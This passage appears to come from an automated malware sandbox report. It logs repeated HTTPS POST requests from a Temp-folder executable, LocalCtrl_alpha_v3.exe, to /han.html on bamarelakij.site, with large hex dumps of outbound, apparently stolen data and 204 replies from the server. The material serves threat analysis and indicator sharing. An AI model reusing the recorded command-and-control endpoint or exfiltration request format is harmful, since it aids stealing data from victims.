ac a4 27 a2 a2 26 28 Data Ascii: VR:h6@5Y4`H4(TL29119.2.!+%823!+%("()-!'&!+)((&-('",,$*++%%)#))$!,-&",('(%$'&'&(
2025-01-09 13:42:56 UTC	15331	OUT	Data Raw: 23 24 25 a4 ac a1 27 23 25 a8 28 ab a2 2c a5 a6 aa a8 29 a1 a5 a2 29 28 a9 23 a1 a8 a5 24 a2 22 a5 24 24 29 27 ab 2a 26 a0 a6 2c 24 25 26 a7 a9 a4 2d a7 a5 ac a4 a6 22 24 27 a2 a4 21 a0 aa 21 a5 2c 2b 2c 2d 2b 2c a6 a0 2d 27 23 2a 2a ac a8 a3 22 a3 2d 24 a5 26 a4 24 2d 25 27 a4 2b 24 2b 2d 24 ac a6 27 a2 a9 a4 a6 23 a4 2a a5 24 a3 a4 28 2c a5 2c 2d 22 21 26 21 2a a5 2a 27 2d 22 a5 2d 2a a5 22 24 a8 a8 25 a1 25 22 2a 29 2b a5 a7 a1 2a a1 2c 28 a6 22 26 a5 a9 a7 21 a3 2d a9 a8 a8 aa 2a 27 23 ac ac a2 a7 a1 25 2b 2d a9 2d aa a9 a2 a9 a7 21 a5 a6 a4 25 a9 a5 a5 a9 2c 2a 2c a4 2a a4 a9 26 21 2a a6 a0 26 a0 2b 2d a2 a6 24 2c a8 2c 2b 29 21 2d a1 22 a5 26 a7 a5 ab 22 ac a8 a4 a2 a8 a1 a5 23 26 a5 21 a6 28 26 a4 a8 a6 a5 22 2a 25 28 29 24 a7 ab a0 2b aa aa a0 a9 Data Ascii: #$%'#%(,))(#$"$$)'&,$%&-"$'!!,+,-+,-'#"-$&$-%'+$+-$'#$(,,-"!&!*'-"-"$%%")+,("&!-'#%+--!%,,&!&+-$,,+)!-"&"#&!(&"*%()$+
2025-01-09 13:42:56 UTC	15331	OUT	Data Raw: 2d 22 2d 24 aa 23 a9 26 2d a0 ab 2a 21 ab aa a4 2d 2c a0 22 a6 22 25 23 27 a4 a3 a1 a6 a3 2d a0 aa 22 2c 24 25 ac 29 29 a1 2d 26 a2 ab 29 a2 2d 26 a7 a2 29 a8 22 22 a9 a2 a5 29 a2 22 28 24 21 21 a5 a4 aa a4 a2 25 a6 22 26 28 26 a5 2c 21 2d a0 a1 a6 a1 2b 21 a7 2c 28 a4 aa a9 ab a9 a0 ac a3 26 25 ac 28 a2 29 23 a2 a9 2b 25 22 23 22 aa a1 29 29 a6 a1 a2 29 ac 23 a0 a7 24 aa a5 a2 ab 21 29 24 a4 2c 2b a0 26 a4 a7 21 a9 aa 2d a4 2b a5 a8 25 ac a8 21 ac ab ab a8 21 2a a8 23 a9 a6 23 a1 a6 24 24 25 a3 2d ab 2d a0 a4 a0 2b 24 21 2c a3 ac 25 a9 a7 a8 23 a5 27 2a 2d 28 2b 25 28 2c 24 2b 22 aa 24 2d 21 a3 22 aa a8 23 a9 2a 2b a0 a4 a9 a2 28 a3 25 28 29 23 2c 2c a2 a1 a4 22 a9 26 aa a2 a5 a5 a3 ac a1 ac ac 29 ac 28 a1 a5 28 a2 26 25 27 aa aa 21 2c a5 aa 28 a0 27 23 Data Ascii: -"-$#&-!-,""%#'-",$%))-&)-&)"")"($!!%"&(&,!-+!,(&%()#+%"#")))#$!)$,+&!-+%!!##$$%--+$!,%#'-(+%(,$+"$-!"#+(%()#,,"&)((&%'!,('#
2025-01-09 13:42:56 UTC	12776	OUT	Data Raw: 27 24 27 aa 27 22 24 a8 a3 aa a1 2d 23 a3 26 23 a0 ab ac 29 a0 ac 2b 22 24 29 a6 a3 a8 2c a0 2c a0 a7 ac a9 a1 27 28 a3 a2 a5 a2 28 a1 a6 a8 21 a4 24 29 23 a0 27 a7 24 24 a0 ab a5 29 2b a4 a7 29 2d ac a9 22 a5 aa 26 a8 2d 23 29 28 a9 a3 23 2b ac 29 22 29 2b 26 a6 a6 28 a5 ab 25 22 2c aa a7 a2 21 27 26 a4 26 27 a7 27 a5 2c 26 a6 2c 26 2b a4 aa a1 ac 27 27 a8 a3 a1 28 22 2c a6 a3 a9 a1 aa a2 a5 29 2a a3 2d 25 24 a6 27 29 aa a2 a5 a2 a4 25 23 25 a4 a0 24 2b 26 24 a7 2b 28 a2 23 21 21 26 ab a7 a5 2d a9 2d a9 ac a9 a9 a7 a8 a4 a6 a0 2c ac 2a 26 27 aa a6 a3 28 a7 24 a1 2b a0 25 aa a2 21 2a 29 25 29 28 29 25 a1 a7 2a a5 2a 22 a1 a7 a2 2d a1 25 2c 22 26 a2 a9 2b 22 2a a5 2b a7 23 a8 ab a2 27 29 a8 22 a8 2c a0 a1 ab 2a a1 a4 26 2c a1 28 a3 24 24 aa 27 24 25 27 a8 Data Ascii: '$''"$-#&#)+"$),,'((!$)#'$$)+)-"&-#)(#+)")+&(%",!'&&'',&,&+''(",)-%$')%#%$+&$+(#!!&--,&'($+%!)%)()%"-%,"&+"+#')",*&,($$'$%'
2025-01-09 13:42:56 UTC	814	IN	HTTP/1.1 204 No Content Date: Thu, 09 Jan 2025 13:42:56 GMT Connection: close v: I/+hipjptZ22kvA+Vo5y5gFoiU/5m5OWTHWfDBjxMvd7mJ5R0ngG+FXDXr5HaMwQW/XKec/37A cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zhgQ7dBs2j%2F4eoR8sK4a2RK4lLcndk%2Fba7vDdDgrDAz0CiFra3MI4%2FANPh88sCn1%2Fxz8ZSVgmYTfAUgk0Mlnww%2FlII4l%2BNHNGl2n4Tnx37dxMs1jyHxWlgSQHiSIGphxGxV3"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff4da7979c95e61-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1569&min_rtt=1563&rtt_var=599&sent=25&recv=65&lost=0&retrans=0&sent_bytes=2838&recv_bytes=59997&delivery_rate=1808049&cwnd=209&unsent_bytes=0&cid=bda70d6542eeae90&ts=580&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.8	49818	172.67.174.91	443	1280	C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 13:42:56 UTC	438	OUT	POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15 fileid: I/+hipjptZ22kvA+Vo5y5gFoiU/5m5OWTHWfDBjxMvd7mJ5R0ngG+FXDXr5HaMwQW/XKec/37A Content-Length: 58769 Host: bamarelakij.site
2025-01-09 13:42:56 UTC	15331	OUT	Data Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 01 56 e5 00 00 08 00 00 00 52 00 00 00 3a eb 68 36 95 a7 40 16 d7 35 c9 59 02 00 00 00 00 00 00 00 00 00 00 00 1d f5 34 1b c9 60 00 48 11 f2 00 00 00 00 00 00 00 00 00 00 1d f5 34 1b 28 a5 81 02 96 00 00 04 04 00 ec 0a 1c ab 54 4c 32 94 ff ff ff ff ff ff ff ff 0d 00 0a 00 a3 39 b0 31 31 b2 39 2e 32 b2 b9 2e a3 a0 a7 21 a1 2b a4 a8 a4 25 17 38 32 33 80 00 08 00 01 02 00 00 00 00 00 00 83 02 00 00 00 00 00 00 80 01 02 fe fd a3 a0 a7 21 a1 2b a4 a8 a4 25 a2 a0 aa 28 ab 22 28 29 2d a1 a1 21 27 a7 26 a4 21 2b 29 28 28 26 2d 28 27 22 2c a6 2c ab a0 24 2a 2b 2b aa 25 25 29 aa a9 23 a4 ab 29 a6 a6 a9 29 a5 a7 a8 24 a1 ac a9 ac aa 21 a6 a9 2c 2d 26 aa 22 2c 28 27 a5 a4 28 25 24 27 26 a4 a5 ac a4 27 a2 a2 26 28 Data Ascii: VR:h6@5Y4`H4(TL29119.2.!+%823!+%("()-!'&!+)((&-('",,$*++%%)#))$!,-&",('(%$'&'&(
2025-01-09 13:42:56 UTC	15331	OUT	Data Raw: 23 24 25 a4 ac a1 27 23 25 a8 28 ab a2 2c a5 a6 aa a8 29 a1 a5 a2 29 28 a9 23 a1 a8 a5 24 a2 22 a5 24 24 29 27 ab 2a 26 a0 a6 2c 24 25 26 a7 a9 a4 2d a7 a5 ac a4 a6 22 24 27 a2 a4 21 a0 aa 21 a5 2c 2b 2c 2d 2b 2c a6 a0 2d 27 23 2a 2a ac a8 a3 22 a3 2d 24 a5 26 a4 24 2d 25 27 a4 2b 24 2b 2d 24 ac a6 27 a2 a9 a4 a6 23 a4 2a a5 24 a3 a4 28 2c a5 2c 2d 22 21 26 21 2a a5 2a 27 2d 22 a5 2d 2a a5 22 24 a8 a8 25 a1 25 22 2a 29 2b a5 a7 a1 2a a1 2c 28 a6 22 26 a5 a9 a7 21 a3 2d a9 a8 a8 aa 2a 27 23 ac ac a2 a7 a1 25 2b 2d a9 2d aa a9 a2 a9 a7 21 a5 a6 a4 25 a9 a5 a5 a9 2c 2a 2c a4 2a a4 a9 26 21 2a a6 a0 26 a0 2b 2d a2 a6 24 2c a8 2c 2b 29 21 2d a1 22 a5 26 a7 a5 ab 22 ac a8 a4 a2 a8 a1 a5 23 26 a5 21 a6 28 26 a4 a8 a6 a5 22 2a 25 28 29 24 a7 ab a0 2b aa aa a0 a9 Data Ascii: #$%'#%(,))(#$"$$)'&,$%&-"$'!!,+,-+,-'#"-$&$-%'+$+-$'#$(,,-"!&!*'-"-"$%%")+,("&!-'#%+--!%,,&!&+-$,,+)!-"&"#&!(&"*%()$+
2025-01-09 13:42:56 UTC	15331	OUT	Data Raw: 2d 22 2d 24 aa 23 a9 26 2d a0 ab 2a 21 ab aa a4 2d 2c a0 22 a6 22 25 23 27 a4 a3 a1 a6 a3 2d a0 aa 22 2c 24 25 ac 29 29 a1 2d 26 a2 ab 29 a2 2d 26 a7 a2 29 a8 22 22 a9 a2 a5 29 a2 22 28 24 21 21 a5 a4 aa a4 a2 25 a6 22 26 28 26 a5 2c 21 2d a0 a1 a6 a1 2b 21 a7 2c 28 a4 aa a9 ab a9 a0 ac a3 26 25 ac 28 a2 29 23 a2 a9 2b 25 22 23 22 aa a1 29 29 a6 a1 a2 29 ac 23 a0 a7 24 aa a5 a2 ab 21 29 24 a4 2c 2b a0 26 a4 a7 21 a9 aa 2d a4 2b a5 a8 25 ac a8 21 ac ab ab a8 21 2a a8 23 a9 a6 23 a1 a6 24 24 25 a3 2d ab 2d a0 a4 a0 2b 24 21 2c a3 ac 25 a9 a7 a8 23 a5 27 2a 2d 28 2b 25 28 2c 24 2b 22 aa 24 2d 21 a3 22 aa a8 23 a9 2a 2b a0 a4 a9 a2 28 a3 25 28 29 23 2c 2c a2 a1 a4 22 a9 26 aa a2 a5 a5 a3 ac a1 ac ac 29 ac 28 a1 a5 28 a2 26 25 27 aa aa 21 2c a5 aa 28 a0 27 23 Data Ascii: -"-$#&-!-,""%#'-",$%))-&)-&)"")"($!!%"&(&,!-+!,(&%()#+%"#")))#$!)$,+&!-+%!!##$$%--+$!,%#'-(+%(,$+"$-!"#+(%()#,,"&)((&%'!,('#
2025-01-09 13:42:56 UTC	12776	OUT	Data Raw: 27 24 27 aa 27 22 24 a8 a3 aa a1 2d 23 a3 26 23 a0 ab ac 29 a0 ac 2b 22 24 29 a6 a3 a8 2c a0 2c a0 a7 ac a9 a1 27 28 a3 a2 a5 a2 28 a1 a6 a8 21 a4 24 29 23 a0 27 a7 24 24 a0 ab a5 29 2b a4 a7 29 2d ac a9 22 a5 aa 26 a8 2d 23 29 28 a9 a3 23 2b ac 29 22 29 2b 26 a6 a6 28 a5 ab 25 22 2c aa a7 a2 21 27 26 a4 26 27 a7 27 a5 2c 26 a6 2c 26 2b a4 aa a1 ac 27 27 a8 a3 a1 28 22 2c a6 a3 a9 a1 aa a2 a5 29 2a a3 2d 25 24 a6 27 29 aa a2 a5 a2 a4 25 23 25 a4 a0 24 2b 26 24 a7 2b 28 a2 23 21 21 26 ab a7 a5 2d a9 2d a9 ac a9 a9 a7 a8 a4 a6 a0 2c ac 2a 26 27 aa a6 a3 28 a7 24 a1 2b a0 25 aa a2 21 2a 29 25 29 28 29 25 a1 a7 2a a5 2a 22 a1 a7 a2 2d a1 25 2c 22 26 a2 a9 2b 22 2a a5 2b a7 23 a8 ab a2 27 29 a8 22 a8 2c a0 a1 ab 2a a1 a4 26 2c a1 28 a3 24 24 aa 27 24 25 27 a8 Data Ascii: '$''"$-#&#)+"$),,'((!$)#'$$)+)-"&-#)(#+)")+&(%",!'&&'',&,&+''(",)-%$')%#%$+&$+(#!!&--,&'($+%!)%)()%"-%,"&+"+#')",*&,($$'$%'
2025-01-09 13:42:57 UTC	808	IN	HTTP/1.1 204 No Content Date: Thu, 09 Jan 2025 13:42:57 GMT Connection: close v: I/+hipjptZ22kvA+Vo5y5gFoiU/5m5OWTHWfDBjxMvd7mJ5R0ngG+FXDXr5HaMwQW/XKec/37A cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Ubqle3gIpf68Qf%2FJcvbKy9Jy1%2F4ceGEfAoSg4P75EbsK2F0rtrGja6md3YP2btlD8vM9wCWYWLWfkaLRc%2BupFkp9X0ZVdyWjKTgURUuTuyBPlfXfJRXgEqmMfBn9XcytKzrM"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff4da7d5e13430d-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1616&min_rtt=1614&rtt_var=610&sent=32&recv=66&lost=0&retrans=0&sent_bytes=2838&recv_bytes=59997&delivery_rate=1785932&cwnd=230&unsent_bytes=0&cid=75bcf4334c5696fd&ts=603&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.8	49819	172.67.174.91	443	1308	C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 13:42:57 UTC	438	OUT	POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15 fileid: I/+hipjptZ22kvA+Vo5y5gFoiU/5m5OWTHWfDBjxMvd7mJ5R0ngG+FXDXr5HaMwQW/XKec/37A Content-Length: 70618 Host: bamarelakij.site
2025-01-09 13:42:57 UTC	15331	OUT	Data Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 01 9f 13 01 00 08 00 00 00 52 00 00 00 c2 21 66 25 95 a7 40 16 d7 35 c9 59 1c 89 00 00 00 00 00 00 00 00 00 00 61 90 33 92 cd 60 53 99 18 98 99 1c 9c 53 34 ba 31 b2 39 3a c9 05 00 e6 25 b2 c8 49 e6 82 00 e6 02 00 e7 00 00 00 80 ff 7a 00 00 ec 13 a4 37 3a b2 36 14 29 94 10 a1 b7 39 b2 14 2a a6 94 19 10 a1 28 aa 10 1b 1b 18 18 10 20 10 19 17 1a 18 10 a3 24 3d c8 df a6 b4 b1 39 b7 b9 b7 33 3a 10 21 b0 b9 b4 b1 10 22 b4 b9 38 36 b0 bc 10 a0 32 b0 38 3a b2 39 60 e1 6e 00 6a 50 53 a9 bc b9 3a b2 b6 54 29 b2 b3 b4 b9 3a 39 bc 54 b9 b6 b9 b9 17 b2 3c b2 d4 b1 b9 39 b9 b9 17 b2 3c b2 d5 bb b4 37 b4 37 b4 3a 17 b2 3c b2 d4 b1 b9 39 b9 b9 17 b2 3c b2 56 bb b4 37 36 b7 b3 b7 37 17 b2 3c b2 56 b9 b2 39 3b b4 b1 b2 Data Ascii: R!f%@5Ya3`SS419:%Iz7:6)9*( $=93:!"8628:9`njPS:T):9T<9<77:<9<V767<V9;
2025-01-09 13:42:57 UTC	15331	OUT	Data Raw: b3 5f ff 8a 89 b0 8e 4d d0 b5 a4 b0 e7 bf 31 af f6 48 9e aa 34 a9 4c 9d 8e b6 a7 a3 c9 2c 9c 2d c7 01 57 f6 d8 dd ea 5d 0b c2 b8 a6 46 5a 44 0b 5e d1 2c d0 e5 70 51 07 bd f6 39 19 a9 67 f4 bd 1c 2c 37 a9 bd 67 de b9 31 ff 3d 41 66 10 2b 2b 00 cf df 44 4d 69 e1 14 f7 0c a3 99 19 37 e4 a8 a9 93 17 67 a7 46 79 0d 05 34 55 27 da 1d 2e 9d aa 96 d0 98 0d 6d 1a ed f5 58 d8 22 21 3d 85 b6 44 fa 2b c9 aa 6e 4f 5e 34 e6 30 66 66 39 60 e0 6e 50 d3 73 2d a2 04 f4 85 be af 25 e7 2b dc 73 4e d2 5e da f8 0d e8 d8 7c c4 de 68 83 8e ab 71 67 b4 8c 8c 53 ab af 36 b0 ed 73 a6 34 d8 90 c4 65 da 33 13 e5 cd 7f 06 2d 2d 1a a7 63 12 18 18 b3 82 a2 3b df bb f7 aa ce 50 87 07 57 6c 54 f4 8b 8b 66 57 a9 65 3f fc 46 2c db 7b b7 1c a9 42 78 ec 6b a9 5e 66 f4 d1 d1 11 77 0d 11 b7 68 Data Ascii: _M1H4L,-W]FZD^,pQ9g,7g1=Af++DMi7gFy4U'.mX"!=D+nO^40ff9`nPs-%+sN^\|hqgS6s4e3--c;PWlTfWe?F,{Bxk^fwh
2025-01-09 13:42:57 UTC	15331	OUT	Data Raw: 22 63 21 2f de 0e 23 80 b8 ef 67 0d 68 0b 2e 8c ad 9f 17 1f ec 2a bc c7 6a c6 3e 7c 20 ef 56 00 58 0a 29 06 5f 7b 6c 90 cb 3e d4 95 96 7f 1e 82 71 7d 06 52 33 68 6a 3f b4 08 fb a5 29 d7 35 07 7e 93 e5 f6 cb 0a 88 3a e4 39 c9 26 7f f1 11 fc a3 21 a9 5e 5e 2a 55 51 fb 2e 1f 7e 91 85 0b 04 8f 68 de 78 d8 79 83 d6 fb 9b c5 97 fc cf 25 36 6c 9f dc 7c df 3e 75 98 01 6c cf 37 d9 9a 5b 4f f1 3f a5 f0 92 f6 af da 61 48 ad 7a 49 b7 c8 1b 3c af b0 b0 d3 ed fa 1b fc 27 d7 0f aa 17 9b 5b d6 3f fe e0 a6 dc 86 1e a1 e8 aa 93 da c0 c2 59 50 46 ab 26 67 52 15 ce c3 ec 71 92 b4 62 47 56 c5 1e ce 41 5a 56 1d 2e 43 ce d5 6b 19 ef 1a f9 05 a3 cb 89 cf e4 24 03 d7 2c 53 b8 cf 7b a8 0c 59 e4 ec 29 a5 8f 64 a2 5e 0c 9c 29 b0 d9 90 2d f2 9d 2a 51 ed 8c b2 27 aa 9c 69 47 53 18 2c Data Ascii: "c!/#gh.j>\| VX)_{l>q}R3hj?)5~:9&!^^UQ.~hxy%6l\|>ul7[O?aHzI<'[?YPF&gRqbGVAZV.Ck$,S{Y)d^)-*Q'iGS,
2025-01-09 13:42:57 UTC	15331	OUT	Data Raw: 5c 57 02 dc 57 62 72 c4 90 d3 42 ec 93 8f 87 10 4f 2e 7e 52 41 7d 43 90 50 08 60 94 f8 a9 56 9c c9 f3 aa 02 1a 84 79 53 8d 86 90 92 d3 22 0f c7 94 05 82 a1 1e dd 80 14 90 33 cf 1e 02 14 1a 86 84 75 03 66 90 b0 5f 4f 7c 16 2c 16 f8 74 8b e6 4d 93 c1 29 9e f8 d8 0c e8 9e d4 f2 92 f1 94 40 45 4a 10 43 8b 77 36 e0 ed 27 2f 64 b0 c8 24 ab a5 50 91 61 2e c2 19 58 64 80 b0 b9 7b 45 32 c2 ba 76 bd 93 ab 6e 59 41 55 5d 1a e5 e5 41 82 8a 08 a9 a8 65 0c cc ec b3 22 c5 72 ab 47 25 62 61 a9 cb b3 e7 ad 8d 55 c5 7b f5 db 52 dc eb b1 8c c1 76 c7 be 96 f1 7d af 88 26 f3 24 22 62 9e 3c d7 c7 01 20 23 16 ec 51 98 e2 21 52 7b d7 5d 57 09 6f 27 93 b3 15 6b ce 9d 7b d9 7d 60 23 fb a6 6e e3 86 b5 59 4b 8e ae b3 69 45 de 0f 93 cb cd 79 22 ad 3a 79 ad 8c d4 7f e1 aa 84 1b 55 38 Data Ascii: \WWbrBO.~RA}CP`VyS"3uf_O\|,tM)@EJCw6'/d$Pa.Xd{E2vnYAU]Ae"rG%baU{Rv}&$"b< #Q!R{]Wo'k{}`#nYKiEy":yU8
2025-01-09 13:42:57 UTC	9294	OUT	Data Raw: a8 56 d8 c1 e4 d2 f0 ca ce 77 44 cc b7 c8 ca 43 39 02 59 b8 70 f4 b5 e8 b9 a9 b4 d3 f7 8a b8 63 9b 57 4e 35 5f 3b 7a 7b 0d 06 1a ad 08 d9 ad e2 f3 19 01 d7 68 48 86 21 67 ac ec ca 9b 5d 8c d9 89 38 cf 38 f9 40 af 14 6e 4a 28 52 bd 46 a3 f4 ec b2 c8 fb 12 b8 a2 eb 9b 63 82 33 33 d8 d5 fd fe b1 fe 07 5d 6c de fa 11 36 4f 08 fc 9a 0f ec 41 ae 11 dd aa 85 14 f7 47 b7 e8 7a 5c 45 5a 97 a5 6f 66 9d b4 4f 21 a5 43 cd 2e ce 8a a1 4a a0 8f c3 af bf 37 1f 2b 13 3e 53 5b 3b 2b fb f8 7a 1d 62 5a 2d 7c 83 06 d1 49 3c db e3 a0 37 71 bb 8b e2 75 ec b2 76 46 54 bd 32 85 3b c4 26 6b 3c 5a eb 77 66 ca c2 df 26 5f a7 7a 74 ee 16 f4 5b df 3f 12 29 51 5c 33 bf cd 8f f4 a6 25 e9 ea 17 74 d5 13 a6 4d 68 76 45 ac c1 ae b4 32 b2 a4 ee 38 3b 91 61 31 db 67 0d 99 09 f6 8e 7a f4 e1 Data Ascii: VwDC9YpcWN5_;z{hH!g]88@nJ(RFc33]l6OAGz\EZofO!C.J7+>S[;+zbZ-\|I<7quvFT2;&k<Zwf&_zt[?)Q\3%tMhvE28;a1gz
2025-01-09 13:42:58 UTC	812	IN	HTTP/1.1 204 No Content Date: Thu, 09 Jan 2025 13:42:58 GMT Connection: close v: I/+hipjptZ22kvA+Vo5y5gFoiU/5m5OWTHWfDBjxMvd7mJ5R0ngG+FXDXr5HaMwQW/XKec/37A cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OSPzuM2%2BDv%2BtflHRGSCLxRzZtm4LTHLdWbRGOWOZ2RnXyyh4zioPivQ6V9rnNX6xC%2BgegbzBvyFQoHAUPs1a4F%2BChmij8iUVhKu47%2Fy6Fz1eK0neYlbg0pfCeKwiotvmL0xI"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8ff4da846a4078e7-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1826&min_rtt=1825&rtt_var=686&sent=29&recv=76&lost=0&retrans=0&sent_bytes=2838&recv_bytes=71890&delivery_rate=1592148&cwnd=234&unsent_bytes=0&cid=8d7ebe6b77c38625&ts=571&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.8	49820	172.67.174.91	443	1280	C:\Users\user\AppData\Local\Temp\LocalCtrl_alpha_v3.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-09 13:42:58 UTC	438	OUT	POST /han.html?mdha4ek675syyz=MaoxMYJpRLF0uadDYPn6AX7MYjuwq76NQtsTiqHKgKs5pFze3iW%2Bc4OTt6pHUjnGI5EovJ7UqMeDJLyBLCyWcA%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.2 Safari/605.1.15 fileid: I/+hipjptZ22kvA+Vo5y5gFoiU/5m5OWTHWfDBjxMvd7mJ5R0ngG+FXDXr5HaMwQW/XKec/37A Content-Length: 70618 Host: bamarelakij.site
2025-01-09 13:42:58 UTC	15331	OUT	Data Raw: 03 00 00 00 00 00 00 00 00 00 00 00 fd ff ff ff 92 00 01 9f 13 01 00 08 00 00 00 52 00 00 00 c2 21 66 25 95 a7 40 16 d7 35 c9 59 1c 89 00 00 00 00 00 00 00 00 00 00 61 90 33 92 cd 60 53 99 18 98 99 1c 9c 53 34 ba 31 b2 39 3a c9 05 00 e6 25 b2 c8 49 e6 82 00 e6 02 00 e7 00 00 00 80 ff 7a 00 00 ec 13 a4 37 3a b2 36 14 29 94 10 a1 b7 39 b2 14 2a a6 94 19 10 a1 28 aa 10 1b 1b 18 18 10 20 10 19 17 1a 18 10 a3 24 3d c8 df a6 b4 b1 39 b7 b9 b7 33 3a 10 21 b0 b9 b4 b1 10 22 b4 b9 38 36 b0 bc 10 a0 32 b0 38 3a b2 39 60 e1 6e 00 6a 50 53 a9 bc b9 3a b2 b6 54 29 b2 b3 b4 b9 3a 39 bc 54 b9 b6 b9 b9 17 b2 3c b2 d4 b1 b9 39 b9 b9 17 b2 3c b2 d5 bb b4 37 b4 37 b4 3a 17 b2 3c b2 d4 b1 b9 39 b9 b9 17 b2 3c b2 56 bb b4 37 36 b7 b3 b7 37 17 b2 3c b2 56 b9 b2 39 3b b4 b1 b2 Data Ascii: R!f%@5Ya3`SS419:%Iz7:6)9*( $=93:!"8628:9`njPS:T):9T<9<77:<9<V767<V9;
2025-01-09 13:42:58 UTC	15331	OUT	Data Raw: b3 5f ff 8a 89 b0 8e 4d d0 b5 a4 b0 e7 bf 31 af f6 48 9e aa 34 a9 4c 9d 8e b6 a7 a3 c9 2c 9c 2d c7 01 57 f6 d8 dd ea 5d 0b c2 b8 a6 46 5a 44 0b 5e d1 2c d0 e5 70 51 07 bd f6 39 19 a9 67 f4 bd 1c 2c 37 a9 bd 67 de b9 31 ff 3d 41 66 10 2b 2b 00 cf df 44 4d 69 e1 14 f7 0c a3 99 19 37 e4 a8 a9 93 17 67 a7 46 79 0d 05 34 55 27 da 1d 2e 9d aa 96 d0 98 0d 6d 1a ed f5 58 d8 22 21 3d 85 b6 44 fa 2b c9 aa 6e 4f 5e 34 e6 30 66 66 39 60 e0 6e 50 d3 73 2d a2 04 f4 85 be af 25 e7 2b dc 73 4e d2 5e da f8 0d e8 d8 7c c4 de 68 83 8e ab 71 67 b4 8c 8c 53 ab af 36 b0 ed 73 a6 34 d8 90 c4 65 da 33 13 e5 cd 7f 06 2d 2d 1a a7 63 12 18 18 b3 82 a2 3b df bb f7 aa ce 50 87 07 57 6c 54 f4 8b 8b 66 57 a9 65 3f fc 46 2c db 7b b7 1c a9 42 78 ec 6b a9 5e 66 f4 d1 d1 11 77 0d 11 b7 68 Data Ascii: _M1H4L,-W]FZD^,pQ9g,7g1=Af++DMi7gFy4U'.mX"!=D+nO^40ff9`nPs-%+sN^\|hqgS6s4e3--c;PWlTfWe?F,{Bxk^fwh
2025-01-09 13:42:58 UTC	15331	OUT	Data Raw: 22 63 21 2f de 0e 23 80 b8 ef 67 0d 68 0b 2e 8c ad 9f 17 1f ec 2a bc c7 6a c6 3e 7c 20 ef 56 00 58 0a 29 06 5f 7b 6c 90 cb 3e d4 95 96 7f 1e 82 71 7d 06 52 33 68 6a 3f b4 08 fb a5 29 d7 35 07 7e 93 e5 f6 cb 0a 88 3a e4 39 c9 26 7f f1 11 fc a3 21 a9 5e 5e 2a 55 51 fb 2e 1f 7e 91 85 0b 04 8f 68 de 78 d8 79 83 d6 fb 9b c5 97 fc cf 25 36 6c 9f dc 7c df 3e 75 98 01 6c cf 37 d9 9a 5b 4f f1 3f a5 f0 92 f6 af da 61 48 ad 7a 49 b7 c8 1b 3c af b0 b0 d3 ed fa 1b fc 27 d7 0f aa 17 9b 5b d6 3f fe e0 a6 dc 86 1e a1 e8 aa 93 da c0 c2 59 50 46 ab 26 67 52 15 ce c3 ec 71 92 b4 62 47 56 c5 1e ce 41 5a 56 1d 2e 43 ce d5 6b 19 ef 1a f9 05 a3 cb 89 cf e4 24 03 d7 2c 53 b8 cf 7b a8 0c 59 e4 ec 29 a5 8f 64 a2 5e 0c 9c 29 b0 d9 90 2d f2 9d 2a 51 ed 8c b2 27 aa 9c 69 47 53 18 2c Data Ascii: "c!/#gh.j>\| VX)_{l>q}R3hj?)5~:9&!^^UQ.~hxy%6l\|>ul7[O?aHzI<'[?YPF&gRqbGVAZV.Ck$,S{Y)d^)-*Q'iGS,
